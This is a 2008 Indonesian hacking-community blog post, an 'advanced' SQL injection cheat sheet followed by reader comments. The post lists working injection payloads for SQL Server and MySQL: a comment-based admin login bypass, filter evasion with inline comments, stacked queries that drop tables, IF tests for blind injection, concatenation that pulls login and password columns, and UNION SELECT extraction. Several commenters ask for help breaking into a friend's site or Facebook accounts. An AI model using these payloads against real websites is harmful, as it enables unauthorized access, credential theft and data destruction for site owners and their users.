Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Simple SQL Injection Tutorial

15 October 2008
Penulis:   · Kategori Artikel: Tutorial

BINUS HACKER Binus Hacker Is Not Criminal Banner





This information is for educational purpose only.
Please use this information wisely.

Udah pada tau kan soal SQL injection?
Yah kalo belum baca deh Tutorialnya (dulu pernah ta buat)
Itu tutorial basic, sekarang kita ke tutorial advance.
Disini ga akan dibahas gimana cara inject nya tapi berbagai syntax yang bisa kita gunakan
untuk menginject suatu website (jika emang bisa diinject).

Oke, lets’ begin

Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#

Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan

2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist

+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya

3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–

4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’

+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)

5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist
+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist

Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist

6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.

Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:
SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel

Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2 FROM namatabel

- Enjoy -

BINUS HACKER Binus Hacker Chat and Forum

Komentar

33 Komentar Untuk “Simple SQL Injection Tutorial
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. Bagas pada 17 October 2008 9:27 pm

    makasih buad pencerahannya

    keep in touch

  2. hypno pada 20 October 2008 7:48 am

    makasi ilmunya om..

  3. belajar pada 31 October 2008 1:28 am

    I Love This Site…

  4. F4rr3l pada 19 January 2009 8:48 pm

    terima kasih banyak atas di muatnya tutor hack ini, coz dengan demikian kita bisa melawan tirani dimuka bumi ini, walau hanya lewat bawah tanah

  5. asa pada 17 March 2009 2:09 am

    peng

  6. p4Ttr0Li_Cy83r pada 4 May 2009 9:02 am

    makasih sql injectionya…bermanfaat bgt buat gw

  7. Lionel pada 10 July 2009 7:46 am

    bagaiman cara protek mysql dari backdoor?
    tolong ya bantuannya,,sekalian contoh scriptnya,,

  8. dewi pada 23 August 2009 12:58 am

    Ok, D3ech

  9. rent pada 10 November 2009 8:07 pm

    gut…gut…semakin hebat nih>>>

  10. hyperbenallu pada 26 December 2009 12:05 am

    lebih kreatif lagi yaw

  11. mulkan pada 2 February 2010 10:58 pm

    Yuuk langsung buat aplikasi pake java dunk

  12. kenken pada 2 May 2010 10:26 pm

    yang bagian awalnya DL dimana ya ???
    thx be4…
    :)

  13. rezkha pada 5 June 2010 11:16 pm

    gilaaaaaaaaaaaaaaaaaaaaaaaaaaaa pertama belajar SQL injection susah bgt….klo gwe butuh 2 minggu lebih ntuk mahamin semua nya tapi itu juga ga sema nya………….dan seneng bisa tau SQL injectio

  14. echa pada 9 July 2010 4:59 am

    SQL injection, gampang2 susah………..

  15. pencari pada 30 August 2010 5:45 am

    bagaimana cara meng-hacke sql yang sudah dibuat dengan ekstensi lain (bulan *.sql, tetapi menjadi *.sdl). Trimakasih

  16. pencari pada 30 August 2010 5:46 am

    bagaimana cara meng-hacke sql yang sudah dibuat dengan ekstensi lain ( *.sql diubah menjadi *.sdl). Trimakasih

  17. Arhan pada 6 September 2010 4:05 am

    ijin copas yah

  18. firman_id pada 24 November 2010 5:55 am

    om mau tnya nie…

    aktifin sql injectnya dmna sie??..

    apakah mengunakn CMD? atau apa??..

    hlf om.. mu ngejail web temen nie yang sotoy…

  19. returnboy pada 20 December 2010 9:32 am

    cara pencegahan bisa pakai ini :

    1. Batasi panjang input box (jika memungkinkan), dengan
    cara membatasinya di kode program, jadi si cracker pemula
    akan bingung sejenak melihat input box nya gak bisa di
    inject dengan perintah yang panjang.

    2. Filter input yang dimasukkan oleh user, terutama penggunaan
    tanda kutip tunggal (Input Validation).

    3. Matikan atau sembunyikan pesan-pesan error yang keluar
    dari SQL Server yang berjalan.

    4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
    Extended Stored Procedures jika memungkinkan.

    5. Ubah “Startup and run SQL Server” menggunakan low privilege user
    di SQL Server Security tab.

    selamat mencoba , mau yg lebih pasti , ya di enkripsi

  20. ridho pada 28 February 2011 10:37 pm

    om ajari om aku bisa komputer tapi pengen ising2 belajar hack omm!!
    tolong perlengkapan yang harus aku sediakan ommm kalau pake program tolong ya om kirimi…thanks sekalian panduan nya ok!! makasih omm Ass wr wb

  21. yuna pada 20 April 2011 2:32 pm

    om aq dak ngrti nih maklum bru prtama kali heheh
    tong dong om kirim ke email saya tutor nya yng lengkap mulai dari awal
    pencarian trgetnya sampai slesay makasih om hehehe

  22. Dhede Dhevidek Newbie pada 10 May 2011 3:12 am

    gannnn <<<<<<baca

    bisa bantu aku ngk buka akun FB??
    SQL ne udah maintance kan??

    tolong pencerahanya ..

    d tunggu d e-mail ku iiaa

    critik dikit..
    mas ScrenShoot NA mANA JADI bINGUNG..

  23. siska pada 15 May 2011 5:37 am

    sgl injection itu mudah, tapi pencarian targetnya yang sepertinya para admin sudah pada pinter

  24. herwan pada 26 May 2011 1:00 am

    maaf artikelna saya copas d blog saya,,, gpp kan????
    kan anak binus baek2…..

    jazakallah khairan katsira…

  25. olin pada 7 April 2012 6:27 am

    ada yang tau softwaree hack fb gak?tpi jngan keylongger… bserta link download nya…

  26. Rezpeztor pada 24 April 2012 8:50 pm

    om mau tnya nie…
    aktifin sql injectnya dmna sie??..
    apakah mengunakn CMD? atau apa??..
    baru mau belajar ne,send ke email y om..thxx

  27. PC Junkie pada 15 November 2012 3:38 am

    Pas dengan yang saya cari

  28. Muhammad mahdi pada 23 November 2012 3:04 am

    Wah om saya petani cabe di bogor neh mau tanya sql injection apa yg mesti dipake utk dapetin nomor voucher untuk isi ulang pulsa xl saya neh, bs sms ke saya 087870675171 buat info itechnya dan skalian kirimin web link adresnya ok om dan bro teman? Thanks

  29. Yu_Dha pada 28 November 2012 6:01 pm

    mkasiih bang…
    saran aje nii…
    lw post tutor advance ksih link basic juga doonk….

  30. solin pada 27 December 2012 2:07 am

    belum pernah selesein 1 web site smpe pasword..

  31. abdijeinlaknat brotherbad pada 16 February 2013 5:58 pm

    share lagi yang lengkap ya. Sekalian tutor’nya.
    Haturnuhun.

  32. Kinoy pada 21 February 2014 1:31 am

    gak ngarti,,, ngarti nih meksipun bolak balik baca,,,,mau nanya juga bingung nanya apa….

  33. kencani wanita pada 22 March 2014 11:00 am

    Terimkasih info nya saya wanita ingin belajar :D

Silahkan Berikan Tanggapan Anda...